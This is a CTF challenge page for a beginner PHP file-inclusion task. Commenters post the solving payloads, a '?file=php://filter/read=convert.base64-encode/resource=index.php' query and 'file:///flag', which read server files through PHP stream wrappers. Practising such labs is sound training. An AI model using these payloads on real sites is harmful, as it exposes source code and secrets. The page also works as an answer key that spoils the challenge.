文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13803
提  示:
描  述:
flag{}
评论
snnxyss 4年前

这伪协议会被重置链接

回复 0

lilitou 4年前

php伪协议,php://filter读取源文件

回复 0

dust 4年前

php://filter/convert.quoted-printable-encode/resource=

回复 2

itlgo 4年前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 3

陈江川0118 4年前

直接运用web协议里的filter协议读取文件源代码即可

回复 0

菜鸟一枚啊 5年前

Php://filter/read=convert.base64-encode/resource=index.php读取index.php,base64解码之后就可以看到flag了

回复 0

15074444830 5年前

没有思路的可以看看这篇文章,我感觉讲的真的很清楚 https://blog.csdn.net/qq_42181428/article/details/87090539?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-1.contr

回复 6

113iamnotme 5年前

file:///flag

回复 5
RuneSpace 4年前

@a2cai 他根据源码判断出来呗

回复 0

Ak4izZ 4年前

这是啥原理

回复 0

dxo0m 5年前

学费了嘻嘻

回复 0

a2cai 5年前

是出得来,大佬能解释下怎么知道flag在这个路径的吗?

回复 0

AA安逸 5年前

简单的说就是利用文件包含读取注释内容 而正常包含是无法读取到注释的 所以需要php伪协议从而读取整个文本

回复 2

⎝吴长奥的88⎠ 5年前

file=php://filter/read=convert.base64-encode/resource=index.php怎么不行

回复 0
linyongtai1109 5年前

最前面加个?

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

亚洲 攻破了该题 4小时前
TohsakaRin 攻破了该题 14小时前
anbd 攻破了该题 1天前
李政 攻破了该题 1天前
WWls= 攻破了该题 2天前
michelle123 攻破了该题 2天前
hotwind 攻破了该题 2天前
小爱莉希雅 攻破了该题 3天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
fl4y 攻破了该题 3天前
青春小豆 攻破了该题 5天前
cheat 攻破了该题 5天前
AWDAI 攻破了该题 5天前
Terrenc44 攻破了该题 5天前
耶无忧 攻破了该题 5天前
jvfnvd.vl 攻破了该题 5天前
niubill 攻破了该题 5天前
Star666 攻破了该题 6天前
whshkdh 攻破了该题 6天前
问题反馈